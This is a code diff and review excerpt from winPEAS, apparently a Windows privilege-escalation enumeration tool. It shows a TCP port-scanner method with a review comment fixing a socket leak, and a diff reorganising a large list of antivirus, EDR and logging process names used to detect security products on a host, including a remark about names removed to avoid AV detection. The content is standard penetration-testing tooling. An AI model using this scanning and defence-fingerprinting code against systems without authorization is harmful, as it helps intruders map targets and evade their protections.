+ state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
+
+ if (state.IsTcpPortOpen == false || newClient.Connected == false)
+ {
+ return;
+ }
+
+ Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
+ }
+
+
+ void AsyncCallback(IAsyncResult asyncResult)
+ {
+ var state = (TcpPortState)asyncResult.AsyncState;
+ TcpClient client = state.MainClient;
+
+ try
+ {
+ client.EndConnect(asyncResult);
+ }
+ catch
+ {
+ return;
+ }
+
+ if (client.Connected && state.IsTcpPortOpen)
+ {
+ return;
+ }
+
+ client.Close();
+ }
+ }
+}
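Review bot: Every TcpClient created in RunScanTcp is leaked. The timeout and not-connected paths (L2149–L2152) return without disposing it, and the open-port path never reaches `client.Close()` because TcpPortState is a struct: the copy boxed into BeginConnect's state argument still holds `IsTcpPortOpen = true`, so the WaitOne result written to the local at L2147 is invisible to AsyncCallback and its early return at L2172–L2175 always fires for a connected socket. With Parallel.ForEach over the top-1000 list this exhausts sockets/handles quickly and leaves timed-out connection attempts running in the background for the OS connect timeout. Own the client's lifetime in RunScanTcp with a using block, which also cancels a still-pending connect on the timeout path (the resulting exception in EndConnect is already swallowed by the bare catch); the `IsTcpPortOpen` field and the Connected check in the callback then become dead and can be removed.

```csharp
public void RunScanTcp(string host, int port)
{
    Thread.Sleep(1);

    using (var newClient = new TcpClient())
    {
        var state = new TcpPortState
        {
            MainClient = newClient,
            IsTcpPortOpen = true
        };

        IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
        // Disposal on every exit path below closes the socket; a pending connect completes with an error in AsyncCallback.
        bool completed = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);

        if (!completed || !newClient.Connected)
        {
            return;
        }

        Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
    }
}
```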
diff --git a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
index c656c0c..6873d4b 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
@@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{
static class DefensiveProcesses
{
- public static Dictionary Definitions = new Dictionary()
+ private static Dictionary> Definitions = new Dictionary>()
{
- {"mcshield.exe" , "McAfee AV"},
- {"windefend.exe" , "Windows Defender AV"},
- {"MSASCui.exe" , "Windows Defender AV"},
- {"MSASCuiL.exe" , "Windows Defender AV"},
- {"msmpeng.exe" , "Windows Defender AV"},
- {"msmpsvc.exe" , "Windows Defender AV"},
- {"WRSA.exe" , "WebRoot AV"},
- {"savservice.exe" , "Sophos AV"},
- {"TMCCSF.exe" , "Trend Micro AV"},
- {"symantec antivirus.exe" , "Symantec AV"},
- {"mbae.exe" , "MalwareBytes Anti-Exploit"},
- {"parity.exe" , "Bit9 application whitelisting"},
- {"cb.exe" , "Carbon Black behavioral analysis"},
- {"bds-vision.exe" , "BDS Vision behavioral analysis"},
- {"Triumfant.exe" , "Triumfant behavioral analysis"},
- {"CSFalcon.exe" , "CrowdStrike Falcon EDR"},
- {"ossec.exe" , "OSSEC intrusion detection"},
- {"TmPfw.exe" , "Trend Micro firewall"},
- {"dgagent.exe" , "Verdasys Digital Guardian DLP"},
- {"kvoop.exe" , " DLP process" },
- {"AAWTray.exe" , ""},
- {"ackwin32.exe" , ""},
- {"Ad-Aware.exe" , ""},
- {"adaware.exe" , ""},
- {"advxdwin.exe" , ""},
- {"agentsvr.exe" , ""},
- {"agentw.exe" , ""},
- {"alertsvc.exe" , ""},
- {"alevir.exe" , ""},
- {"alogserv.exe" , ""},
- {"amon9x.exe" , ""},
- {"anti-trojan.exe" , ""},
- {"antivirus.exe" , ""},
- {"ants.exe" , ""},
- {"apimonitor.exe" , ""},
- {"aplica32.exe" , ""},
- {"apvxdwin.exe" , ""},
- {"arr.exe" , ""},
- {"atcon.exe" , ""},
- {"atguard.exe" , ""},
- {"atro55en.exe" , ""},
- {"atupdater.exe" , ""},
- {"atwatch.exe" , ""},
- {"au.exe" , ""},
- {"aupdate.exe" , ""},
- {"auto-protect.nav80try.exe", ""},
- {"autodown.exe" , ""},
- {"autoruns.exe" , ""},
- {"autorunsc.exe" , ""},
- {"autotrace.exe" , ""},
- {"autoupdate.exe" , ""},
- {"avconsol.exe" , ""},
- {"ave32.exe" , ""},
- {"avgcc32.exe" , ""},
- {"avgctrl.exe" , ""},
- {"avgemc.exe" , ""},
- {"avgnt.exe" , ""},
- {"avgrsx.exe" , ""},
- {"avgserv.exe" , ""},
- {"avgserv9.exe" , ""},
- {"avguard.exe" , ""},
- {"avgwdsvc.exe" , ""},
- {"avgui.exe" , ""},
- {"avgw.exe" , ""},
- {"avkpop.exe" , ""},
- {"avkserv.exe" , ""},
- {"avkservice.exe" , ""},
- {"avkwctl9.exe" , ""},
- {"avltmain.exe" , ""},
- {"avnt.exe" , ""},
- {"avp.exe" , ""},
- {"avp32.exe" , ""},
- {"avpcc.exe" , ""},
- {"avpdos32.exe" , ""},
- {"avpm.exe" , ""},
- {"avptc32.exe" , ""},
- {"avpupd.exe" , ""},
- {"avsched32.exe" , ""},
- {"avsynmgr.exe" , ""},
- {"avwin.exe" , ""},
- {"avwin95.exe" , ""},
- {"avwinnt.exe" , ""},
- {"avwupd.exe" , ""},
- {"avwupd32.exe" , ""},
- {"avwupsrv.exe" , ""},
- {"avxmonitor9x.exe" , ""},
- {"avxmonitornt.exe" , ""},
- {"avxquar.exe" , ""},
- {"backweb.exe" , ""},
- {"bargains.exe" , ""},
- {"bd_professional.exe" , ""},
- {"beagle.exe" , ""},
- {"belt.exe" , ""},
- {"bidef.exe" , ""},
- {"bidserver.exe" , ""},
- {"bipcp.exe" , ""},
- {"bipcpevalsetup.exe" , ""},
- {"bisp.exe" , ""},
- {"blackd.exe" , ""},
- {"blackice.exe" , ""},
- {"blink.exe" , ""},
- {"blss.exe" , ""},
- {"bootconf.exe" , ""},
- {"bootwarn.exe" , ""},
- {"borg2.exe" , ""},
- {"bpc.exe" , ""},
- {"brasil.exe" , ""},
- {"bs120.exe" , ""},
- {"bundle.exe" , ""},
- {"bvt.exe" , ""},
- {"ccapp.exe" , ""},
- {"ccevtmgr.exe" , ""},
- {"ccpxysvc.exe" , ""},
- {"ccSvcHst.exe" , ""},
- {"cdp.exe" , ""},
- {"cfd.exe" , ""},
- {"cfgwiz.exe" , ""},
- {"cfiadmin.exe" , ""},
- {"cfiaudit.exe" , ""},
- {"cfinet.exe" , ""},
- {"cfinet32.exe" , ""},
- {"claw95.exe" , ""},
- {"claw95cf.exe" , ""},
- {"clean.exe" , ""},
- {"cleaner.exe" , ""},
- {"cleaner3.exe" , ""},
- {"cleanpc.exe" , ""},
- {"cleanup.exe" , ""},
- {"click.exe" , ""},
- {"cmdagent.exe" , ""},
- {"cmesys.exe" , ""},
- {"cmgrdian.exe" , ""},
- {"cmon016.exe" , ""},
- {"connectionmonitor.exe" , ""},
- {"cpd.exe" , ""},
- {"cpf9x206.exe" , ""},
- {"cpfnt206.exe" , ""},
- {"ctrl.exe" , ""},
- {"cv.exe" , ""},
- {"cwnb181.exe" , ""},
- {"cwntdwmo.exe" , ""},
- {"CylanceUI.exe" , ""},
- {"CyProtect.exe" , ""},
- {"CyUpdate.exe" , ""},
- {"cyserver.exe" , ""},
- {"cytray.exe" , ""},
- {"CyveraService.exe" , ""},
- {"datemanager.exe" , ""},
- {"dcomx.exe" , ""},
- {"defalert.exe" , ""},
- {"defscangui.exe" , ""},
- {"defwatch.exe" , ""},
- {"deputy.exe" , ""},
- {"divx.exe" , ""},
- {"dgprompt.exe" , ""},
- {"DgService.exe" , ""},
- {"dllcache.exe" , ""},
- {"dllreg.exe" , ""},
- {"doors.exe" , ""},
- {"dpf.exe" , ""},
- {"dpfsetup.exe" , ""},
- {"dpps2.exe" , ""},
- {"drwatson.exe" , ""},
- {"drweb32.exe" , ""},
- {"drwebupw.exe" , ""},
- {"dssagent.exe" , ""},
- {"dumpcap.exe" , ""},
- {"dvp95.exe" , ""},
- {"dvp95_0.exe" , ""},
- {"ecengine.exe" , ""},
- {"efpeadm.exe" , ""},
- {"egui.exe" , ""},
- {"ekrn.exe" , ""},
- {"emet_agent.exe" , ""},
- {"emet_service.exe" , ""},
- {"emsw.exe" , ""},
- {"engineserver.exe" , ""},
- {"ent.exe" , ""},
- {"esafe.exe" , ""},
- {"escanhnt.exe" , ""},
- {"escanv95.exe" , ""},
- {"espwatch.exe" , ""},
- {"ethereal.exe" , ""},
- {"etrustcipe.exe" , ""},
- {"evpn.exe" , ""},
- {"exantivirus-cnet.exe" , ""},
- {"exe.avxw.exe" , ""},
- {"expert.exe" , ""},
- {"explore.exe" , ""},
- {"f-agnt95.exe" , ""},
- {"f-prot.exe" , ""},
- {"f-prot95.exe" , ""},
- {"f-stopw.exe" , ""},
- {"fameh32.exe" , ""},
- {"fast.exe" , ""},
- {"fch32.exe" , ""},
- {"fcagswd.exe" , "McAfee DLP Agent"},
- {"fcags.exe" , "McAfee DLP Agent"},
- {"fih32.exe" , ""},
- {"findviru.exe" , ""},
- {"firesvc.exe" , "McAfee Host Intrusion Prevention"},
- {"firetray.exe" , ""},
- {"firewall.exe" , ""},
- {"fnrb32.exe" , ""},
- {"fp-win.exe" , ""},
- {"fp-win_trial.exe" , ""},
- {"fprot.exe" , ""},
- {"frameworkservice.exe" , ""},
- {"frminst.exe" , ""},
- {"frw.exe" , ""},
- {"fsaa.exe" , ""},
- {"fsav.exe" , ""},
- {"fsav32.exe" , ""},
- {"fsav530stbyb.exe" , ""},
- {"fsav530wtbyb.exe" , ""},
- {"fsav95.exe" , ""},
- {"fsgk32.exe" , ""},
- {"fsm32.exe" , ""},
- {"fsma32.exe" , ""},
- {"fsmb32.exe" , ""},
- {"gator.exe" , ""},
- {"gbmenu.exe" , ""},
- {"gbpoll.exe" , ""},
- {"generics.exe" , ""},
- {"gmt.exe" , ""},
- {"guard.exe" , ""},
- {"guarddog.exe" , ""},
- {"hacktracersetup.exe" , ""},
- {"hbinst.exe" , ""},
- {"hbsrv.exe" , ""},
- {"HijackThis.exe" , ""},
- {"hipsvc.exe" , ""},
- {"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
- {"hotactio.exe" , ""},
- {"hotpatch.exe" , ""},
- {"htlog.exe" , ""},
- {"htpatch.exe" , ""},
- {"hwpe.exe" , ""},
- {"hxdl.exe" , ""},
- {"hxiul.exe" , ""},
- {"iamapp.exe" , ""},
- {"iamserv.exe" , ""},
- {"iamstats.exe" , ""},
- {"ibmasn.exe" , ""},
- {"ibmavsp.exe" , ""},
- {"icload95.exe" , ""},
- {"icloadnt.exe" , ""},
- {"icmon.exe" , ""},
- {"icsupp95.exe" , ""},
- {"icsuppnt.exe" , ""},
- {"idle.exe" , ""},
- {"iedll.exe" , ""},
- {"iedriver.exe" , ""},
- {"iface.exe" , ""},
- {"ifw2000.exe" , ""},
- {"inetlnfo.exe" , ""},
- {"infus.exe" , ""},
- {"infwin.exe" , ""},
- {"init.exe" , ""},
- {"intdel.exe" , ""},
- {"intren.exe" , ""},
- {"iomon98.exe" , ""},
- {"istsvc.exe" , ""},
- {"jammer.exe" , ""},
- {"jdbgmrg.exe" , ""},
- {"jedi.exe" , ""},
- {"kavlite40eng.exe" , ""},
- {"kavpers40eng.exe" , ""},
- {"kavpf.exe" , ""},
- {"kazza.exe" , ""},
- {"keenvalue.exe" , ""},
- {"kerio-pf-213-en-win.exe" , ""},
- {"kerio-wrl-421-en-win.exe" , ""},
- {"kerio-wrp-421-en-win.exe" , ""},
- {"kernel32.exe" , ""},
- {"KeyPass.exe" , ""},
- {"killprocesssetup161.exe" , ""},
- {"launcher.exe" , ""},
- {"ldnetmon.exe" , ""},
- {"ldpro.exe" , ""},
- {"ldpromenu.exe" , ""},
- {"ldscan.exe" , ""},
- {"lnetinfo.exe" , ""},
- {"loader.exe" , ""},
- {"localnet.exe" , ""},
- {"lockdown.exe" , ""},
- {"lockdown2000.exe" , ""},
- {"lookout.exe" , ""},
- {"lordpe.exe" , ""},
- {"lsetup.exe" , ""},
- {"luall.exe" , ""},
- {"luau.exe" , ""},
- {"lucomserver.exe" , ""},
- {"luinit.exe" , ""},
- {"luspt.exe" , ""},
- {"mapisvc32.exe" , ""},
- {"masvc.exe" , "McAfee Agent"},
- {"mbamservice.exe" , ""},
- {"mcafeefire.exe" , ""},
- {"mcagent.exe" , ""},
- {"mcmnhdlr.exe" , ""},
- {"mcscript.exe" , ""},
- {"mcscript_inuse.exe" , ""},
- {"mctool.exe" , ""},
- {"mctray.exe" , ""},
- {"mcupdate.exe" , ""},
- {"mcvsrte.exe" , ""},
- {"mcvsshld.exe" , ""},
- {"md.exe" , ""},
- {"mfeann.exe" , "McAfee VirusScan Enterprise"},
- {"mfemactl.exe" , "McAfee VirusScan Enterprise"},
- {"mfevtps.exe" , ""},
- {"mfin32.exe" , ""},
- {"mfw2en.exe" , ""},
- {"mfweng3.02d30.exe" , ""},
- {"mgavrtcl.exe" , ""},
- {"mgavrte.exe" , ""},
- {"mghtml.exe" , ""},
- {"mgui.exe" , ""},
- {"minilog.exe" , ""},
- {"minionhost.exe" , ""},
- {"mmod.exe" , ""},
- {"monitor.exe" , ""},
- {"moolive.exe" , ""},
- {"mostat.exe" , ""},
- {"mpfagent.exe" , ""},
- {"mpfservice.exe" , ""},
- {"mpftray.exe" , ""},
- {"mrflux.exe" , ""},
- {"msapp.exe" , ""},
- {"msbb.exe" , ""},
- {"msblast.exe" , ""},
- {"mscache.exe" , ""},
- {"msccn32.exe" , ""},
- {"mscman.exe" , ""},
- {"msconfig.exe" , ""},
- {"msdm.exe" , ""},
- {"msdos.exe" , ""},
- {"msiexec16.exe" , ""},
- {"msinfo32.exe" , ""},
- {"mslaugh.exe" , ""},
- {"msmgt.exe" , ""},
- {"msmsgri32.exe" , ""},
- {"MsSense.exe" , "Microsoft Defender ATP"},
- {"mssmmc32.exe" , ""},
- {"mssys.exe" , ""},
- {"msvxd.exe" , ""},
- {"mu0311ad.exe" , ""},
- {"mwatch.exe" , ""},
- {"n32scanw.exe" , ""},
- {"naprdmgr.exe" , ""},
- {"nav.exe" , ""},
- {"navap.navapsvc.exe" , ""},
- {"navapsvc.exe" , ""},
- {"navapw32.exe" , ""},
- {"navdx.exe" , ""},
- {"navlu32.exe" , ""},
- {"navnt.exe" , ""},
- {"navstub.exe" , ""},
- {"navw32.exe" , ""},
- {"navwnt.exe" , ""},
- {"nc2000.exe" , ""},
- {"ncinst4.exe" , ""},
- {"ndd32.exe" , ""},
- {"neomonitor.exe" , ""},
- {"neowatchlog.exe" , ""},
- {"netarmor.exe" , ""},
- {"netd32.exe" , ""},
- {"netinfo.exe" , ""},
- {"netmon.exe" , ""},
- {"netscanpro.exe" , ""},
- {"netspyhunter-1.2.exe" , ""},
- {"netstat.exe" , ""},
- {"netutils.exe" , ""},
- {"nisserv.exe" , ""},
- {"nisum.exe" , ""},
- {"nmain.exe" , ""},
- {"nod32.exe" , ""},
- {"normist.exe" , ""},
- {"norton_internet_secu_3.0_407.exe" , ""},
- {"notstart.exe" , ""},
- {"npf40_tw_98_nt_me_2k.exe" , ""},
- {"npfmessenger.exe" , ""},
- {"nprotect.exe" , ""},
- {"npscheck.exe" , ""},
- {"npssvc.exe" , ""},
- {"nsched32.exe" , ""},
- {"nssys32.exe" , ""},
- {"nstask32.exe" , ""},
- {"nsupdate.exe" , ""},
- {"nt.exe" , ""},
- {"ntrtscan.exe" , ""},
- {"ntvdm.exe" , ""},
- {"ntxconfig.exe" , ""},
- {"nui.exe" , ""},
- {"nupgrade.exe" , ""},
- {"nvarch16.exe" , ""},
- {"nvc95.exe" , ""},
- {"nvsvc32.exe" , ""},
- {"nwinst4.exe" , ""},
- {"nwservice.exe" , ""},
- {"nwtool16.exe" , ""},
- {"nxlog.exe" , ""},
- {"ollydbg.exe" , ""},
- {"onsrvr.exe" , ""},
- {"optimize.exe" , ""},
- {"ostronet.exe" , ""},
- {"osqueryd.exe" , ""},
- {"otfix.exe" , ""},
- {"outpost.exe" , ""},
- {"outpostinstall.exe" , ""},
- {"outpostproinstall.exe" , ""},
- {"padmin.exe" , ""},
- {"panixk.exe" , ""},
- {"patch.exe" , ""},
- {"pavcl.exe" , ""},
- {"pavproxy.exe" , ""},
- {"pavsched.exe" , ""},
- {"pavw.exe" , ""},
- {"pccwin98.exe" , ""},
- {"pcfwallicon.exe" , ""},
- {"pcip10117_0.exe" , ""},
- {"pcscan.exe" , ""},
- {"pdsetup.exe" , ""},
- {"periscope.exe" , ""},
- {"persfw.exe" , ""},
- {"perswf.exe" , ""},
- {"pf2.exe" , ""},
- {"pfwadmin.exe" , ""},
- {"pgmonitr.exe" , ""},
- {"pingscan.exe" , ""},
- {"platin.exe" , ""},
- {"pop3trap.exe" , ""},
- {"poproxy.exe" , ""},
- {"popscan.exe" , ""},
- {"portdetective.exe" , ""},
- {"portmonitor.exe" , ""},
- {"powerscan.exe" , ""},
- {"ppinupdt.exe" , ""},
- {"pptbc.exe" , ""},
- {"ppvstop.exe" , ""},
- {"prizesurfer.exe" , ""},
- {"prmt.exe" , ""},
- {"prmvr.exe" , ""},
- {"procdump.exe" , ""},
- {"processmonitor.exe" , ""},
- {"procexp.exe" , ""},
- {"procexp64.exe" , ""},
- {"procexplorerv1.0.exe" , ""},
- {"procmon.exe" , ""},
- {"programauditor.exe" , ""},
- {"proport.exe" , ""},
- {"protectx.exe" , ""},
- {"pspf.exe" , ""},
- {"purge.exe" , ""},
- {"qconsole.exe" , ""},
- {"qserver.exe" , ""},
- {"rapapp.exe" , ""},
- {"rav7.exe" , ""},
- {"rav7win.exe" , ""},
- {"rav8win32eng.exe" , ""},
- {"ray.exe" , ""},
- {"rb32.exe" , ""},
- {"rcsync.exe" , ""},
- {"realmon.exe" , ""},
- {"reged.exe" , ""},
- {"regedit.exe" , ""},
- {"regedt32.exe" , ""},
- {"rescue.exe" , ""},
- {"rescue32.exe" , ""},
- {"rrguard.exe" , ""},
- {"rtvscan.exe" , ""},
- {"rtvscn95.exe" , ""},
- {"rulaunch.exe" , ""},
- {"run32dll.exe" , ""},
- {"rundll.exe" , ""},
- {"rundll16.exe" , ""},
- {"ruxdll32.exe" , ""},
- {"safeweb.exe" , ""},
- {"sahagent.exescan32.exe" , ""},
- {"save.exe" , ""},
- {"savenow.exe" , ""},
- {"sbserv.exe" , ""},
- {"scam32.exe" , ""},
- {"scan32.exe" , ""},
- {"scan95.exe" , ""},
- {"scanpm.exe" , ""},
- {"scrscan.exe" , ""},
- {"SentinelOne.exe" , ""},
- {"serv95.exe" , ""},
- {"setupvameeval.exe" , ""},
- {"setup_flowprotector_us.exe", ""},
- {"sfc.exe" , ""},
- {"sgssfw32.exe" , ""},
- {"sh.exe" , ""},
- {"shellspyinstall.exe" , ""},
- {"shn.exe" , ""},
- {"showbehind.exe" , ""},
- {"shstat.exe" , "McAfee VirusScan Enterprise"},
- {"SISIDSService.exe" , ""},
- {"SISIPSUtil.exe" , ""},
- {"smc.exe" , ""},
- {"sms.exe" , ""},
- {"smss32.exe" , ""},
- {"soap.exe" , ""},
- {"sofi.exe" , ""},
- {"sperm.exe" , ""},
- {"splunk.exe" , "Splunk"},
- {"splunkd.exe" , "Splunk"},
- {"splunk-admon.exe" , "Splunk"},
- {"splunk-powershell.exe" , "Splunk"},
- {"splunk-winevtlog.exe" , "Splunk"},
- {"spf.exe" , ""},
- {"sphinx.exe" , ""},
- {"spoler.exe" , ""},
- {"spoolcv.exe" , ""},
- {"spoolsv32.exe" , ""},
- {"spyxx.exe" , ""},
- {"srexe.exe" , ""},
- {"srng.exe" , ""},
- {"ss3edit.exe" , ""},
- {"ssgrate.exe" , ""},
- {"ssg_4104.exe" , ""},
- {"st2.exe" , ""},
- {"start.exe" , ""},
- {"stcloader.exe" , ""},
- {"supftrl.exe" , ""},
- {"support.exe" , ""},
- {"supporter5.exe" , ""},
- {"svchostc.exe" , ""},
- {"svchosts.exe" , ""},
- {"sweep95.exe" , ""},
- {"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
- {"symproxysvc.exe" , ""},
- {"symtray.exe" , ""},
- {"sysedit.exe" , ""},
- {"sysmon.exe" , "Sysinternals Sysmon"},
- {"sysupd.exe" , ""},
- {"TaniumClient.exe" , "Tanium"},
- {"taskmg.exe" , ""},
- {"taskmo.exe" , ""},
- {"taumon.exe" , ""},
- {"tbmon.exe" , ""},
- {"tbscan.exe" , ""},
- {"tc.exe" , ""},
- {"tca.exe" , ""},
- {"tcm.exe" , ""},
- {"tcpview.exe" , ""},
- {"tds-3.exe" , ""},
- {"tds2-98.exe" , ""},
- {"tds2-nt.exe" , ""},
- {"teekids.exe" , ""},
- {"tfak.exe" , ""},
- {"tfak5.exe" , ""},
- {"tgbob.exe" , ""},
- {"titanin.exe" , ""},
- {"titaninxp.exe" , ""},
- {"tlaservice.exe" , ""},
- {"tlaworker.exe" , ""},
- {"tracert.exe" , ""},
- {"trickler.exe" , ""},
- {"trjscan.exe" , ""},
- {"trjsetup.exe" , ""},
- {"trojantrap3.exe" , ""},
- {"tsadbot.exe" , ""},
- {"tshark.exe" , ""},
- {"tvmd.exe" , ""},
- {"tvtmd.exe" , ""},
- {"udaterui.exe" , ""},
- {"undoboot.exe" , ""},
- {"updat.exe" , ""},
- {"update.exe" , ""},
- {"updaterui.exe" , ""},
- {"upgrad.exe" , ""},
- {"utpost.exe" , ""},
- {"vbcmserv.exe" , ""},
- {"vbcons.exe" , ""},
- {"vbust.exe" , ""},
- {"vbwin9x.exe" , ""},
- {"vbwinntw.exe" , ""},
- {"vcsetup.exe" , ""},
- {"vet32.exe" , ""},
- {"vet95.exe" , ""},
- {"vettray.exe" , ""},
- {"vfsetup.exe" , ""},
- {"vir-help.exe" , ""},
- {"virusmdpersonalfirewall.exe", ""},
- {"vnlan300.exe" , ""},
- {"vnpc3000.exe" , ""},
- {"vpc32.exe" , ""},
- {"vpc42.exe" , ""},
- {"vpfw30s.exe" , ""},
- {"vptray.exe" , ""},
- {"vscan40.exe" , ""},
- {"vscenu6.02d30.exe" , ""},
- {"vsched.exe" , ""},
- {"vsecomr.exe" , ""},
- {"vshwin32.exe" , ""},
- {"vsisetup.exe" , ""},
- {"vsmain.exe" , ""},
- {"vsmon.exe" , ""},
- {"vsstat.exe" , ""},
- {"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
- {"vswin9xe.exe" , ""},
- {"vswinntse.exe" , ""},
- {"vswinperse.exe" , ""},
- {"w32dsm89.exe" , ""},
- {"w9x.exe" , ""},
- {"watchdog.exe" , ""},
- {"webdav.exe" , ""},
- {"webscanx.exe" , ""},
- {"webtrap.exe" , ""},
- {"wfindv32.exe" , ""},
- {"whoswatchingme.exe" , ""},
- {"wimmun32.exe" , ""},
- {"win-bugsfix.exe" , ""},
- {"win32.exe" , ""},
- {"win32us.exe" , ""},
- {"winactive.exe" , ""},
- {"window.exe" , ""},
- {"windows.exe" , ""},
- {"wininetd.exe" , ""},
- {"wininitx.exe" , ""},
- {"winlogin.exe" , ""},
- {"winmain.exe" , ""},
- {"winnet.exe" , ""},
- {"winppr32.exe" , ""},
- {"winrecon.exe" , ""},
- {"winservn.exe" , ""},
- {"winssk32.exe" , ""},
- {"winstart.exe" , ""},
- {"winstart001.exe" , ""},
- {"wintsk32.exe" , ""},
- {"winupdate.exe" , ""},
- {"wireshark.exe" , ""},
- {"wkufind.exe" , ""},
- {"wnad.exe" , ""},
- {"wnt.exe" , ""},
- {"wradmin.exe" , ""},
- {"wrctrl.exe" , ""},
- {"wsbgate.exe" , ""},
- {"wupdater.exe" , ""},
- {"wupdt.exe" , ""},
- {"wyvernworksfirewall.exe" , ""},
- {"xagt.exe" , ""},
- {"xpf202en.exe" , ""},
- {"zapro.exe" , ""},
- {"zapsetup3001.exe" , ""},
- {"zatutor.exe" , ""},
- /*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
- {"zonealarm" , ""},
- {"_avp32" , ""},
- {"_avpcc" , ""},
- {"rshell" , ""},
- {"_avpms" , ""}*/
+ { "ALYac", new HashSet() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
+ { "AVG Antivirus", new HashSet() { "avgui.exe", } },
+ { "AVG", new HashSet() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
+ { "Ad-Aware Total Security by Lavasoft", new HashSet() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
+ { "AhnLab-V3", new HashSet() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
+ { "Antiy-AVL", new HashSet() { "avl.exe", } },
+ { "Arcabit", new HashSet() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
+ { "Avast Antivirus", new HashSet() { "avastui.exe", } },
+ { "Avast", new HashSet() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
+ { "Avira", new HashSet() { "avira.webapphost.exe", } },
+ { "Baidu", new HashSet() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
+ { "BitDefender", new HashSet() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
+ { "Bkav Pro", new HashSet() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
+ { "CMC", new HashSet() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
+ { "Cisco", new HashSet() { "sfc.exe", } },
+ { "ClamAV", new HashSet() { "clamscan.exe", "freshclam.exe", } },
+ { "Comodo", new HashSet() { "cavwp.exe", "cfp.exe", } },
+ { "CrowdStrike Falcon", new HashSet() { "falconsensorwinos.exe", } },
+ { "Cybereason", new HashSet() { "cybereasonransomfreeservicehost.exe", } },
+ { "Cylance", new HashSet() { "cylancesvc.exe", } },
+ { "Cynet", new HashSet() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
+ { "Cyradar", new HashSet() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
+ { "DrWeb", new HashSet() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
+ { "ESET-NOD32", new HashSet() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
+ { "F-Secure", new HashSet() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
+ { "G Data AntiVirus", new HashSet() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
+ { "GridinSoft Anti-Malware", new HashSet() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
+ { "IObit Malware Fighter 3", new HashSet() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
+ { "IObit Malware Fighter 6", new HashSet() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
